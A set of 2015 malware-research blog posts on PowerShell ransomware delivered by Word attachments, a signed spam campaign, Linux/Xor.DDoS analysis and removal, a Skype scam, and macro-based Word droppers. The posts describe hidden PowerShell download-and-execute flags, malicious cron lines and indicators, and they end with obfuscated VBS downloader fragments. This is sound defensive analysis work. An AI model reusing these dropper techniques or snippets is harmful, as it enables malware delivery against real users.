Friday, November 13, 2015

More ransomware shenanigans


Recently, an update of the infamous CryptoWall ransomware (or cryptoware) was released - you can read more about that particular ransomwere here: CryptoWall 4.0 released with new Features such as Encrypted File Names

Additionally, another ransomware variant has made a return, read more about that one here:
“Offline” Ransomware Encrypts Your Data without C&C Communication

And let's not forget about this one either: Chimera Ransomware focuses on business computers

Did I mention yet there's ransomware for Linux as well? Have a look at Linux.Encoder.1 while you're at it.

... But wait, there's more! You've guessed it, yet another ransomware variant has returned. I wonder what's going on these days, the (cyber)criminals seem to get even more competitive.

Lawrence Abrams over at Bleeping Computer recently wrote an article about the variant we have here as well, as we have caught an updated variant of Poshcoder or Poshkoder or Power Worm:
Shoddy Programming causes new Ransomware to destroy your Data


Moving on to the infection vector and process:







Kan du kontrollera den bifogade filen och låt mig veta vad du tycker? Tack









I just got this document, could you please check it and get back to me? Thanks


Email headers indicate:
Received: from techdallas.xyz (45.63.12.192.vultr.com [45.63.12.192])

45.63.12.192 - IPvoid - Whois

IP location: United States (VirusTotal)








Attached is a file called Bilaga.doc or Document.doc. Other variations are possible, depending on the language (in this case either Swedish or English).

Let's see what's inside Bilaga.doc:

Ole10Native is in fact a VBS file


As you can see, there's an ObjectPool present, containing an Ole native file. The former contains storages for embedded OLE objects. In this case, it's containing a VBS file: 


The VBscript uses Powershell with certain flags or parameters to download a file to the %TEMP% folder and execute it:
(Note that by default PowerShell is configured to prevent the execution of PowerShell scripts on Windows systems)

  • -WindowStyle hidden: don't display anything to the user (set WindowStyle as hidden)
  • -ExecutionPolicy Bypass: no scrips are blocked, neither are there any warnings or prompts
  • -nologo: starts the PowerShell console without displaying the copyright banner
  • -noprofile: tells PowerShell to not load profile (user) scripts
You can find a tad more information on these commands here.

But what is the user seeing? Opening the Word document, there's another, clickable 'document': 
Clicking the icon, warning message from Word
















Decoy message













Then nothing happens, except in the background:
PowerShell download & running the malware







Another PowerShell script (.ps1 file) is being executed, which will start encrypting files with the following extensions:

"*.pdf","*.xls","*.docx","*.xlsx","*.mp3","*.waw","*.jpg","*.jpeg","*.txt","*.rtf","*.doc","*.rar","*.zip","*.psd","*.tif","*.wma","*.gif","*.bmp","*.ppt","*.pptx","*.docm","*.xlsm","*.pps","*.ppsx","*.ppd","*.eps","*.png","*.ace","*.djvu","*.tar","*.cdr","*.max","*.wmv","*.avi","*.wav","*.mp4","*.pdd","*.php","*.aac","*.ac3","*.amf","*.amr","*.dwg","*.dxf","*.accdb","*.mod","*.tax2013","*.tax2014","*.oga","*.ogg","*.pbf","*.ra","*.raw","*.saf","*.val","*.wave","*.wow","*.wpk","*.3g2","*.3gp","*.3gp2","*.3mm","*.amx","*.avs","*.bik","*.dir","*.divx","*.dvx","*.evo","*.flv","*.qtq","*.tch","*.rts","*.rum","*.rv","*.scn","*.srt","*.stx","*.svi","*.swf","*.trp","*.vdo","*.wm","*.wmd","*.wmmp","*.wmx","*.wvx","*.xvid","*.3d","*.3d4","*.3df8","*.pbs","*.adi","*.ais","*.amu","*.arr","*.bmc","*.bmf","*.cag","*.cam","*.dng","*.ink","*.jif","*.jiff","*.jpc","*.jpf","*.jpw","*.mag","*.mic","*.mip","*.msp","*.nav","*.ncd","*.odc","*.odi","*.opf","*.qif","*.xwd","*.abw","*.act","*.adt","*.aim","*.ans","*.asc","*.ase","*.bdp","*.bdr","*.bib","*.boc","*.crd","*.diz","*.dot","*.dotm","*.dotx","*.dvi","*.dxe","*.mlx","*.err","*.euc","*.faq","*.fdr","*.fds","*.gthr","*.idx","*.kwd","*.lp2","*.ltr","*.man","*.mbox","*.msg","*.nfo","*.now","*.odm","*.oft","*.pwi","*.rng","*.rtx","*.run","*.ssa","*.text","*.unx","*.wbk","*.wsh","*.7z","*.arc","*.ari","*.arj","*.car","*.cbr","*.cbz","*.gz","*.gzig","*.jgz","*.pak","*.pcv","*.puz","*.r00","*.r01","*.r02","*.r03","*.rev","*.sdn","*.sen","*.sfs","*.sfx","*.sh","*.shar","*.shr","*.sqx","*.tbz2","*.tg","*.tlz","*.vsi","*.wad","*.war","*.xpi","*.z02","*.z04","*.zap","*.zipx","*.zoo","*.ipa","*.isu","*.jar","*.js","*.udf","*.adr","*.ap","*.aro","*.asa","*.ascx","*.ashx","*.asmx","*.asp","*.indd","*.asr","*.qbb","*.bml","*.cer","*.cms","*.crt","*.dap","*.htm","*.moz","*.svr","*.url","*.wdgt","*.abk","*.bic","*.big","*.blp","*.bsp","*.cgf","*.chk","*.col","*.cty","*.dem","*.elf","*.ff","*.gam","*.grf","*.h3m","*.h4r","*.iwd","*.ldb","*.lgp","*.lvl","*.map","*.md3","*.mdl","*.mm6","*.mm7","*.mm8","*.nds","*.pbp","*.ppf","*.pwf","*.pxp","*.sad","*.sav","*.scm","*.scx","*.sdt","*.spr","*.sud","*.uax","*.umx","*.unr","*.uop","*.usa","*.usx","*.ut2","*.ut3","*.utc","*.utx","*.uvx","*.uxx","*.vmf","*.vtf","*.w3g","*.w3x","*.wtd","*.wtf","*.ccd","*.cd","*.cso","*.disk","*.dmg","*.dvd","*.fcd","*.flp","*.img","*.iso","*.isz","*.md0","*.md1","*.md2","*.mdf","*.mds","*.nrg","*.nri","*.vcd","*.vhd","*.snp","*.bkf","*.ade","*.adpb","*.dic","*.cch","*.ctt","*.dal","*.ddc","*.ddcx","*.dex","*.dif","*.dii","*.itdb","*.itl","*.kmz","*.lcd","*.lcf","*.mbx","*.mdn","*.odf","*.odp","*.ods","*.pab","*.pkb","*.pkh","*.pot","*.potx","*.pptm","*.psa","*.qdf","*.qel","*.rgn","*.rrt","*.rsw","*.rte","*.sdb","*.sdc","*.sds","*.sql","*.stt","*.t01","*.t03","*.t05","*.tcx","*.thmx","*.txd","*.txf","*.upoi","*.vmt","*.wks","*.wmdb","*.xl","*.xlc","*.xlr","*.xlsb","*.xltx","*.ltm","*.xlwx","*.mcd","*.cap","*.cc","*.cod","*.cp","*.cpp","*.cs","*.csi","*.dcp","*.dcu","*.dev","*.dob","*.dox","*.dpk","*.dpl","*.dpr","*.dsk","*.dsp","*.eql","*.ex","*.f90","*.fla","*.for","*.fpp","*.jav","*.java","*.lbi","*.owl","*.pl","*.plc","*.pli","*.pm","*.res","*.rsrc","*.so","*.swd","*.tpu","*.tpx","*.tu","*.tur","*.vc","*.yab","*.8ba","*.8bc","*.8be","*.8bf","*.8bi8","*.bi8","*.8bl","*.8bs","*.8bx","*.8by","*.8li","*.aip","*.amxx","*.ape","*.api","*.mxp","*.oxt","*.qpx","*.qtr","*.xla","*.xlam","*.xll","*.xlv","*.xpt","*.cfg","*.cwf","*.dbb","*.slt","*.bp2","*.bp3","*.bpl","*.clr","*.dbx","*.jc","*.potm","*.ppsm","*.prc","*.prt","*.shw","*.std","*.ver","*.wpl","*.xlm","*.yps","*.md3","*.1cd"

As you can see, it has covered quite a lot of extensions. Nathan Scott from Bleeping Computer provided an image with a great explanation on what the script does:

(Source)



















In the version I saw, the PowerShell scripts were slightly different, in fact an 'improved version'.

After encrypting all your files, it will drop an HTML file (named DECRYPT_INSTRUCTION.html) on the root of all your folders which contains the following message:

Ransom message - you may need to pay up to $ 1000















It generates your #UUID by the following simple PowerShell command:
Get-wmiobject Win32_ComputerSystemProduct UUID

When visiting said Onion (Tor) link:

Unlock message



Difference here from the version of October is that they also offer to decrypt 1 file, as proof they can actually decrypt all your files again. Unfortunately, the encryption fails horribly (for example, no extension is appended) and your files will be unrecoverable. For more information, see here.



Prevention

  • Don't open attachments from unknown senders - ever.
  • Install an antivirus and keep it up-to-date and running. Enable the option to scan Compressed Files. 
  • Consider disabling Windows Script Host. You can use my tool, Rem-VBSworm with option D for example.
  • Alternatively, you can install Analog X's Script Defender, which will block these scripts (JS, VBS, ...) as well.
  • Consider disabling PowerShell if you don't need or use it. There are two possible options:



    Note that if you have a company laptop, you should inform with your network administrator first.
  • Improve security for your Microsoft Office package. (Word, Excel, ...)
    This means disabling ActiveX, disabling macros and blocking external content. Useful links:
    Enable or disable ActiveX controls in Office documents
    Enable or disable macros in Office documents
    Block or unblock external content in Office documents
  • As with all ransomware cases: take backups!

Some time ago, I did a Q&A on ransomware, which also included several general tips on how to prevent (ransomware and other) malware. You can find and read those tips here.




Disinfection
  • Identify and kill malicious processes (use Task Manager for example). In this specific case:
    winword.exe, wscript.exe, powershell.exe
  • Run a full scan with your installed antivirus product.
  • Run a full scan with another antivirus and/or antimalware product.
  • In a company: unplug your network cable & warn your network administrator immediately!



Conclusion

Ransomware is far from dead (that is, encrypting ransomware or cryptoware, the "old" ransomware isn't very much around anymore), thus it's important to take preventive measures as outlined above.

You may find IOCs (Indicators Of Compromise) as usual on AlienVault's OTX.


Resources

Microsoft - ObjectPool Storage


Acknowledgments

Thanks to my colleague Ville from Panda Security Sweden for alerting me about this incident and Lawrence & Nathan over at Bleeping Computer for their already available information.

Tuesday, November 10, 2015

A quick look at a signed spam campaign


I noticed the following tweet pass by on Twitter:


The mail received is as follows:

Spam but digitally signed















As Robert correctly notes, since the mail is digitally signed, it may entice people more to open the attachment and get infected. In case you're wondering, the key id of the certificate is as follows:
FE:22:B7:24:E3:4F:27:D9:05:E0:CC:B8:BD:DE:F4:8D:23:FD:2F:D9 (copy of cert on Pastebin)
Issuer: C=IT, O=DigitPA, OU=Ufficio interoperabilita' e cooperazione, CN=DigitPA CA1

Signature details. S/MIME message format





















Both first and second mail are coming from: 175.156.221.127 - IPvoid - Whois (DomainTools)

IP location: Singapore (VirusTotal)









On to the attachment (the .xml file is harmless):


"recalculation.zip" attached













Hello
This recalculation of payments for the last month.
I remind you of your debt 3148,48 AUD.
Please pay as soon as possible.


The ZIP file contains 2 files: recalculation_77979.pdf.js & info_9455.txt. The TXT file just contains the name of the first file, which tries to hide as a PDF file but is in fact JavaScript (JS).

Part of the JavaScript

















You can find the original JavaScript on Pastebin. You can also find the decoded base64 here and the final obtained JavaScript here. In the final JavaScript, you'll see it downloads a file and renames it to a random filename, then executes it:

Download

Run










It fetches a file from: 203.255.186.156 - IPvoid - Whois (DomainTools)
IP location: Korea (VirusTotal)








The eventual payload may be Andromeda/Gamarue, which will make your machine part of a botnet. Some information on the dropped DLL file (this is all static analysis):

Meta-data
==================================================================
File:    28236726.dll
Size:    495630 bytes
Type:    PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
MD5:     934df5b173790da14ef3a817ec1fc422
SHA1:    e90b6e45f255350d0fd4cba361a09ad5d8271af1
ssdeep:  12288:GysxmAb/DC7BfWLc9ivHsegWDhNSKDWrV5rJfT:jo768wAAExDoPr9
Date:    0x429CE7C3 [Tue May 31 22:40:03 2005 UTC]
EP:      0x1000bddb .text 0/5
CRC:     Claimed: 0x0, Actual: 0x83498 [SUSPICIOUS]
Packers: Armadillo v1.xx - v2.xx

Functions in our DLL file




















You may also find the file on VirusTotal, SHA1 hash: e90b6e45f255350d0fd4cba361a09ad5d8271af1


There's also an analysis available by Reverse.it (Hybrid Analysis) on Windows 7 32bit & Windows 7 64bit. Feel free to perform any additional research on it, let me know if you find something interesting or should you find out exactly which kind of malware this is.

Just as a note, while all that is happening in the background, a decoy PDF file gets opened as well, as to not raise suspicion:

Decoy PDF document (not malicious)
















Prevention

For administrators:
  • Sender's end: Create an SPF record, as to prevent sender address forgery. More on SPF here.
  • Receiver's end: Turn on SPF checking on your mailserver.
  • If possible, turn on full support for DMARC. More on DMARC here.
  • Check that only your mailserver may access the WAN (or RED) on port 25. Configure this in your firewall.
  • Check that you use strong passwords for your Domain Controller server(s). 
  • Check that antivirus is installed, up-to-date and running on all workstations. (if applicable)
  • If not needed, you can disable Windows Script Host (WSH), as it's needed for JavaScript to run locally. Read how to do that here

For endusers:
  • Don't open attachments from unknown senders - ever.
  • Install an antivirus and keep it up-to-date and running. Enable the option to scan Compressed Files. 
  • Preferably, see that your antivirus has a firewall as well, to prevent unauthorised access.
  • Consider disabling Windows Script Host. You can use my tool, Rem-VBSworm with option D for example.
  • Alternatively, you can install Analog X's Script Defender, which will block these scripts (JS, VBS, ...) as well.
Some time ago, I did a Q&A on ransomware, which also included several general tips on how to prevent (ransomware and other) malware. You can find and read those tips here.




Disinfection

As usual:
  • Look for suspicious Run keys (find locations here) and delete the associated file(s).
    In our case, all files were dropped in the %TEMP% folder. Also, don't forget to look for rundll32.exe processes, as the payload was a DLL file. More information on rundll32 here.
  • Run a full scan with your installed antivirus product.
  • Run a full scan with another antivirus and/or antimalware product.
  • In a company: warn your network administrator immediately!




Conclusion

Now how was that mail sent out? There's no sure way of telling - it's possible the company is compromised (by either malware or an attacker), there's no SPF record, the certificate has been stolen (unlikely but not impossible), .... Most likely, a machine is infected by a spambot.

Note that with PEC (Posta Elettronica Certificata), a user can send a signed message even when the mailserver is not compromised. PEC means the server signs a message to ensure timestamp and sender, not content. More on PEC here (ITA) or here (EN). See also point 2 and 4 in the Prevention tips above.

I've contacted all related parties and hoping I'll get a reply soon, or at the very least they will perform some analysis and cleaning.

Follow the prevention tips above to stay safe. If you're looking for Indicators of Compromise (IOCs), they can be found as usual on AlienVault's OTX 

Friday, September 25, 2015

Notes on Linux/Xor.DDoS


In this post we'll be focusing on a certain kind of malware: Linux/Xor.DDoS (also known as DDoS.XOR or Xorddos). As usual, we'll break the post down in several points:

Background
Diagnosis
Analysis
Disinfection
Prevention
Conclusion

The variant discussed in this blog post is an older variant, so certain infection mechanisms may have changed, as well as C&C's. The point of this post is to familiarize yourself with ELF malware in a better way - how to diagnose, analyse, remove and finally prevent malware from infecting your Linux machines. A lot of malware is going around and it's not (all) exclusively for Windows machines.



Background
You may have heard about Linux/Xor.DDoS already, a Linux Trojan with rootkit capabilities (belonging to the category of 'ELF malware'). What exactly is an ELF file? According to Wikipedia:

In computing, the Executable and Linkable Format (ELF, formerly called Extensible Linking Format) is a common standard file format for executables, object code, shared libraries, and core dumps.
Source
In other words: ELF is to Linux as PE (.exe, .com, .scr, ...) is to Windows and Mach-O to OS X.

There's a nice mini poster available by Corkami as well:

(Source)















More information about the ELF format can also be found at the Resources section.

If you haven't heard about Linux/Xor.DDoS itself already, be sure to read the initial post by MalwareMustDie uncovering this malware:
Fuzzy reversing a new China ELF "Linux/XOR.DDoS"

In short: Xor.DDoS is a multi-platform, polymorphic malware for Linux OS and its ultimate goal is to DDoS other machines. The name Xor.DDoS stems from the heavy usage of XOR encryption in both malware and network communication to the C&Cs (command and control servers).

There have been other write-ups about this malware as well, which will be mentioned throughout this article or referenced in the Resources section.



Diagnosis
How do you know you're infected with Xor.DDoS?

First and foremost (and obviously), you'll be conducting DDoS attacks from your machine(s) to targets chosen by the malware authors.

Sending of large SYN packets (Source)








You may use netstat to print any current network/internet connections. Use tcpdump to get a more detailed analysis of which packets you are sending out.


Secondly, another indication is seeing processes running with random names and sudden new executable files created in /etc/init.d/ or /usr/bin/ (see example below). New entries will be/are added to your crontab as well (/etc/crontab).

Malware running and its related files






















You may use any command based on top or on ps to check for running malicious processes. We will see more in the Disinfection part of this blog post.

Thirdly, if you are running the standard OpenSSH server you may see an unauthorised but successful login and immediate logout afterwards.
(Source)








These symptoms should be very clear, even more so if you've already implemented several measures to protect yourself from potential intruders. If not, then it'll be harder to track the infection origin as well. (but more often than not the SSH credentials of the root users are brute forced.)

To ensure your machines will not get pwned, be sure to read the Prevention part of this blog post.



Analysis
First off, we have to identify how the malware entered the system. Usually, a weak root password is used (like admin or 123456, see here for a list of tried passwords. Note: huge .txt file!) or the attackers are brute forcing their way in. (brute forcing the SSH credentials of the root user) Another, but less common possibility, is exploiting a vulnerable service that you have running (Apache for example).

This figure is an excellent visual representation on how it all happens:

(Source)

























This variant copies itself over to /lib/libgcc.so, then creates a copy in /etc/init.d and a symbolic link to /usr/bin. Afterwards a new cron script is created and added to the crontab.

We will now take a look at one of the samples created - named bmtsfnlgxu.
(SHA1: b34b6f0ec42a0153c043b0665ec47bf6e5aac894)

Easiest way on Linux is to just use the "file" command:




We can see it's an ELF 32-bit executable for i386 - and it's not stripped.

Why is that last part important? strip allows you to remove symbols and sections from choosen files, which in turn makes it harder to reverse engineer (disassemble) as well. In this case, the file doesn't seem to be stripped, great! For example, we can see the source files and get an idea of what this malware does:
(this will also be shown later on in the video below, using IDA)
















Moving on, we will start by using readelf for some further investigation of the file. We know, thanks to the file command, it's an ELF 32-bit executable for i386. Using readelf and parameter -h we will be able to gather more information:

















This gives us more information already, for example; the magic (7F 45 4C 46 for ELF files, 4D 5A for MZ files)  2's complement, little endian,  the exact type of the file (an executable; other types for ELF files may be a relocatable file, a shared object, a core file or processor specific) but most importantly here being the Entry point address, or the start of the program.

In regards to readelf, using parameter -a we can dump a ton of information, you can find the output of this command on our malware on Pastebin: Xor.DDoS - "readelf -a" output

Note that VirusTotal has added (since November 2014) detailed ELF information in reports as well, which is more or less similar to readelf's output.

To disassemble the file, we can use objdump which allows us to disassemble only those sections which are expected to contain instructions (-d parameter) or to disassemble the contents of all sections (-D parameter).


However, to dive a bit deeper into the malware code, we will be using IDA, a multi-processor disassembler and debugger and Radare, a well-known (portable) reversing framework. Note that it will still be a quick glance, as MalwareMustDie has already reported extensively  about it as well [1][2][3][4]. Note also that it's always a good idea to analyse malware in a virtual environment (VM).

We will be using both tools on Windows, but you can just as easily run them on Linux or Mac.

I've made an instruction video on how to use IDA Pro Free to take a quick peek into the file discussed:


Download IDA Pro Free for Windows from here. If you're interested in working more with IDA, there's a handy list of IDA plugins available here.



... And just the same for Radare, where we will discover a bit more - namely the C&C of the malware:


Download radare2 for Windows from here. More documentation about Radare can be found here. There's also a handy cheat sheet available here.

Note that the Xor.DDoS variant discussed in this blog uses 2 XOR keys for its (network) communication, they are the following:

  • BB2FA36AAA9541F0
  • ECB6D3479AC3823F


If you like GUIs, then I have another useful utility: ELFparser. It will perform a scoring based on several factors, such as shell commands, HTTP functionality and process manipulation. For example, for our file:











You can see it's scored pretty highly. I wonder what it has to say about the hardcoded IP addresses..:

You can also see 8.8.8.8, Google's DNS server
and likely used to resolve the C&C domains




















Great, it was able to extract our C&C servers:
103.25.9.228 - VirusTotal - IPvoid - DomainTools (whois)
103.25.9.229 - VirusTotal - IPvoid - DomainTools (whois)

Using ELFparser you can also look at the ELF header, sections, but also all of its capabilities like Information Gathering and Network Functions for example. It's a handy second-opinion tool.

Finally, one last tool which should not be missed when analysing ELF files: a sandbox. We will be using detux, a multiplatform Linux sandbox.

Connections to wangzongfacai.com and dsaj2a1.org














You have Network Analysis (IPs connected and DNS queries) and Static Analysis (Elf Info and Strings). In our example we have connections to wangzongfacai.com, not an unfamiliar domain. View the complete report made by Detux on our file here.

It's worth noting that several months ago, I already sent a file to Detux (and VirusTotal) which yielded similar results:

3000uc.com, another familiar player - and again dsaj2aX










Detux report of that file here. When I sent the latter file to VirusTotal several months ago, it only had 12 detections, after re-submitting it had 19 detections. That's better but we're still not there.
Just a visual representation of detection difference. Read this for info.















You may find an overview of all gathered files as well as most common/recurring domains and their IPs they connect to/download from here, available via AlienVault's OTX.

That's it for our Analysis section, let's move on to Disinfection.



Disinfection
Most importantly, you'd of course like to remove/disinfect this malware completely. Some pointers:

  • Identify malicious processes: run ps ef (ps stands for process status) to see which processes are running. Alternatively, you can use top or again ps with other parameters, for example ps ej or ps aux for a more complete, human readable table. Look for processes with random names; in our example it started with S90 and random letters afterwards, linked to files with all random names, as is the case in our example malware named bmtsfnlgxu.

    Once you've identified the malicious process(es), you can use the following command to find related files as well: for pid in $(ps -C -o pid=); do ls -la /proc/$pid/fd; done
    Where is the name of the suspicious process. This command will display any open, related files. For example, for bmtsfnlgxu it would be:
    for pid in $(ps -C bmtsfnlgxu -o pid=); do ls -la /proc/$pid/fd; done


  • Identify malicious files: look for newly created files in /etc/init.d/, /boot/ and /usr/bin/. Again, look for files with random names. You may also use the command ls -lat | head to view recently changed files.

    Check your crontab (/etc/crontab). Delete the malicious cron jobs, more specifically the cron.hourly jobs and in the case of Xor.DDoS they will be the following:

    */3 * * * * root /etc/cron.hourly/cron.sh
    */3 * * * * root /etc/cron.hourly/udev.sh

    Delete these two lines from your crontab. Don't forget to save. Delete the related files, located in /etc/cron.hourly. In our case, their content was as follows:

    cron.sh


         udev.sh





As said earlier, delete these files manually, as well as the file(s) mentioned in the scripts. (in this case: /lib/libgcc.so.bak, /lib/libgcc.so and /lib/libgcc4.4.so.) Note that these files are not related to GCC's runtime library and thus can be safely deleted. It's just another way how the malware tries to hide itself.

Also double-check there are no malicious files or scripts in /etc/rc.d. If so, remove them as well.


  • Stop and kill malicious processes: identify the parent process; usually it will be the one consuming the most CPU (which you can verify using any of the earlier commands, top being the easiest). Firstly, be sure to stop the parent process and wait for the child processes to die. Use the command: kill -STOP $pid

    When the child processes are dead, kill the parent by using: kill -9 $pid
    Note:
    in case you see any other malicious processes, go through the last 2 commands again.

  • Delete any leftover malicious files: locations where the malware may reside have been indicated before, but to be complete:

    / (root directory, in rare cases)
    /bin/
    /boot/
    /etc/init.d/
    /etc/rc.d
    /etc/rcX.d (where X is a number)
    /lib/
    /lib/udev/
    /sbin/
    /tmp/
    /usr/bin/

That's it. Some additional tips and tricks: 
  • Use rm -rf to permanently remove a file. Be careful with this command.
  • Having troubles removing a file? Are you root? If not, try killing a process or deleting a file using root by prepending sudo before your command. For example: sudo kill -STOP $pid
  • Malicious process keeps coming back? Go over the steps again, but this time note down where the malware resides. Make that directory and its files unmodifiable by making use of the chattr command. For example, malware is being recreated in /usr/bin/. Use the command: chattr -R +i /usr/bin/ Then, stop the parent, wait for the children to die and kill the parent. Remove the files. Don't forget to use chattr again after you cleaned the infection. (in our example: chattr -R -i /usr/bin/)

    It's also possible the malware is temporarily storing files into /tmp/ while you are trying to kill its processes. When that happens, use the same chattr command on the /tmp/ directory and start over. If you are in doubt, use that chattr command on all aforementioned directories and start over. Very important: do not forget to use chattr -R -i on them afterwards!
  • In rare cases, the attacker may still be connected to your box. If possible, cut the internet connection and go over the disinfection steps. If this is not possible, firstly stop SSH by entering the command:
    sudo /etc/init.d/ssh stop

    Then, use iptables to drop any connection to the IPs the malware is connecting to (use netstat for example, see also Diagnosis) and to drop any connection from the attacker or cybercriminal. How to do this:

    In our example, we learned that our C&C's were 103.25.9.228 and 103.25.9.229. Thus, type or copy/paste these 2 commands:
    iptables -A OUTPUT -d 103.25.9.228 -j DROP
    iptables -A OUTPUT -d 103.25.9.229 -j DROP


    To block connection(s) from the attacker (you can find the attacker's IP using netstat for example):
    iptables -A INPUT -s $attackerIP -j DROP

    Don't forget to save your freshly created iptables rules by using the command
    /etc/init.d/iptables save

    Afterwards, change all passwords. (SSH, your user, root)

Best case scenario here is obviously:

  • restoring from a backup 
  • if the machine is virtual, restore to a previous snapshot
When you have either of these available, don't forget to change all passwords afterwards to prevent re-infection - and patch your machine(s)!

Some Xor.DDoS variants may also incorporate a rootkit. In that case, hope you have a "best case scenario" available to you. Once a box is fully compromised, it may be hard to reinstate it back to normal or its original state.

For double-checking for rootkits and other malware, you may want to check out chkrootkit or alternatively, rkhunter. Additionally, you may download and install an antivirus, for example ClamAV.

If you perform manual clean-up as indicated above and have confirmed all is in order again, you can install ClamAV and perform an extra scan to be sure. Better be safe than sorry. Then, follow the prevention tips below to stay safe.



Prevention
  • Use strong passwords for SSH or use keys instead of passwords for authentication. You can read how to do that here. In the unlikely event of you not needing SSH to a particular machine, disable it on that machine by:
    sudo apt-get remove openssh-server


    To disable it from starting up you can use:
    update-rc.d -f ssh remove
  • Don't open the incoming SSH port (default 22) to ANY, but rather restrict it to trusted IP addresses.
  • For more information about safely using SSH, see: SSH: Best practices
  • Use a strong firewall. In Linux there are many options, iptables is a solid choice. A good basic iptables howto can be found here. In a network or if you need to protect several machines, you may want to consider a seperate hardware appliance as your firewall/UTM/... of choice.
  • Iptables can do a very decent job once properly configured. In case you want to do less manual work, I advise to check out sshguard or artillery. Both can monitor and alert you when something funky happens. In the context of our blog post, it also looks for & protects against SSH bruteforce attempts. Another application to consider is fail2ban. An additional tool is snort. For more information about these tools, refer to their pages.
  • Consider using SELinux. Security-Enhanced Linux is a compulsory access control security mechanism provided in the kernel.

  • Consider locking down cron jobs to only certain users. To deny all users from using cron you can use:
    echo ALL >>/etc/cron.deny
  • Consider disabling remote root login. Read how to do that here.
  • If you browse a lot, consider using NoScript as well.
  • Keep your software and applications up-to-date, as on any system.
  • Consider installing an antivirus as second opinion or at least as an additional layer. This is not a necessity but may come in handy. I recommend ClamAV.
  • Don't forget to protect other appliances that may be running on *nix systems, for example your router (and nowadays, IoT devices). Upgrade the firmware as soon as possible and change the default root/admin password(s). Install updates/patches for your particular firewall/UTM/... as well.
  • For even more (general) tips on hardening your Linux system (not against Xor.DDoS in particular):
    20 Linux Server Hardening Security Tips




Conclusion
Don't be fooled: Linux malware very much exists and starts to become more prevalent. Other prevalent Linux malware nowadays is:

  • Every ELF malware made by the ChinaZ actor or group (Linux/ChinaZ.DDoS, Linux/Kluh, ...)
  • Linux/Aes.DDoS (Dofloo, MrBlack)
  • Linux/Bash0day (Shellshock, Bashdoor)
  • Linux/BillGates (Gates.B)
  • Linux/Elknot (DnsAmp)
  • Linux/GoARM (Ramgo, Goram)
  • Linux/IptabLes and Linux/IptabLex


Note that this list is not complete and new ELF malware may pop up every day. (it's not a question of if, but when it will pop up) You can find a list of (interesting) Linux malware here.

Hopefully you have learned new things along the way of this blog post. For any specific questions, don't hesitate to leave a comment or contact me on Twitter: @bartblaze

To conclude this blog post, some acknowledgements and resources/references:

Acknowledgements

My colleague from Panda France, Julien Gourlaouen for informing me about this incident.

Everyone who helped, helps and will help in battling creators of ELF malware, in particular @MalwareMustDie for their excellent research and increasing awareness about these threats.

Last but not least, thank you for reading my blog post. 


Resources

AlienVault - Xor.DDoS hashes, IPs and domains (see also related pulses)
Avast -  Linux DDoS Trojan hiding itself with an embedded rootkit
Cisco -  Threat Spotlight: SSHPsychos
FireEye - Anatomy of a Brute Force Campaign: The Story of Hee Thai Limited
KernelMode - Linux/Xor.DDoS (samples)
KernelMode - List of Linux Malware
MalwareMustDie - Fuzzy reversing a new China ELF "Linux/XOR.DDoS"
MalwareMustDie - Linux/XorDDoS infection incident report (CNC: HOSTASA.ORG)
MalwareMustDie - A bad Shellshock & Linux/XOR.DDoS CNC "under the hood"
MalwareMustDie - Polymorphic in ELF malware: Linux/Xor.DDOS
Yale - ELF Format (PDF)

Friday, July 10, 2015

Scams spreading through Skype



I got a message today on Skype to check out an eBay page with my name on. Sounds great!

Hey $name! Look http://www.ebay.com/new/$username





Another example is:






However, the link was not exactly pointing to eBay:

Not eBay, but what appears to be google.dj







Turns out the actual link behind the eBay one is pointing to:





What follows after is for tracking and to disable the Redirect notice message from Google. For those who are curious, google.dj is a legitimate website of Google for the African country Djibouti.

The what seems to be random numbers is actually just hex for:





When you click the link, you will simply do a Google search for that webpage and visit it. This does not mean google.dj is compromised in any way. As an example, you can use the same link but instead use google.com instead of google.dj.

On the lengthy site mentioned above, you'll get a Javascript which you can view on this Pastebin link:
Scams spreading through Skype
(In short, it does a simple math.random method to serve you a slightly different website each time.)



Fiddler capture






Eventually, you'll end up on a typical weight loss scam website:

Obviously not the real Women's Health website









Trying to leave the website










Long story short.....


Prevention

Install the WOT extension into your browser. (Compatible with most modern browsers)
WOT is a community-based tool and is therefore very useful for these kinds of scams, whereas other users can warn you about the validity.

Use a strong password for Skype and anything else for that matter.

Don't click on "funny" links. A trick is to "hover" on the link to reveal the actual website behind it.



Disinfection

Close your browser.

Change your Skype password immediately. How do I change my password?

If the message came from an unknown contact, How do I report abuse by someone in Skype?

If the message came from a friend, be sure to notify him/her and to follow the steps in this post.

To be sure, you can always run a scan with your favorite antivirus and/or antimalware product. (however, I have not seen any malware in this particular campaign)


Conclusion

In the past, malware has spread via Skype, but this is the first time I'm seeing a scam presented in this way. I have contacted Skype to ask how they were able to hide the actual website behind the eBay link, as I do not know - if you do, be sure to let me know in the comments.

Also, follow the steps above to stay safe.

Friday, May 8, 2015

New malicious Office docs trick


It all starts with the 1,000,000th usual spam mail in your inbox:

Have you received an order form? No.











The content is as follows:


Dear,

We have received your order form [AY19358KXN]  and we thank you very much. Our sales department informs us that they are able to dispatch your stock by the end of next week following your packing instructions.

As agreed, we have arranged transport. We are sending herewith a copy of our pro-forma invoice.

The consignment will be sent as soon as the bank informs us that the sum is available. We hope you will be satisfied with the fulfilment of this order and that it will be the beginning of a business relationship to our mutual benefit.


Attached is a DOC file with (surprise) a macro attached. However, the method's different than usual:


In the past, there have been some other new tricks as well, for example:
Analyzing an MS Word document not detected by AV software
XML: A New Vector For An Old Trick
Malware authors go a step further to access bank accounts

In regards to any Office files, you can simply open the file in Notepad++ for example and you'll see the .mso appended at the end. The new thing here is that it's a Word MHTML file with macro(s).

Using olevba (by @decalage2), we can extract and automatically decode the .mso object - which contains a bunch of (what appears to be) random gibberish:

Function that "Returns the character associated with the specified character code"






You can use the ASCII character code chart to figure out what this malware is doing exactly, for example the first line Chr$(104) & Chr$(116) & Chr$(116) & Chr$(112) is simply "HTTP".

Another option is to use a Python program made by Xavier Mertens, deobfuscate_chr.py.
You can find a Pastebin here with the extracted + deobfuscated macro.


Short analysis of this .doc file using olevba












Other tools are available as well, for example oledump and emldump from Didier Stevens.

Emldump + passing through oledump extracted a malicious link











 
Now, what happens when you execute this malicious Word file?

Oops, seems macros are disabled :)







If macros are enabled, or you choose to enable the macro in that document, a Pastebin download link was opened and the file was executed. Process flow is:

Word document -> download VBS from Pastebin -> Execute VBS -> Downloads & executes EXE file -> Downloads & executes another EXE file.

Visually, you might get either of these images:

dim JHyygUBjdfg: Set JHyygUBjdfg = createobject(Microsoft.XMLHTTP )
dim jhvHVKfdg: Set jhvHVKfdg = createobject(Adodb.Stream )
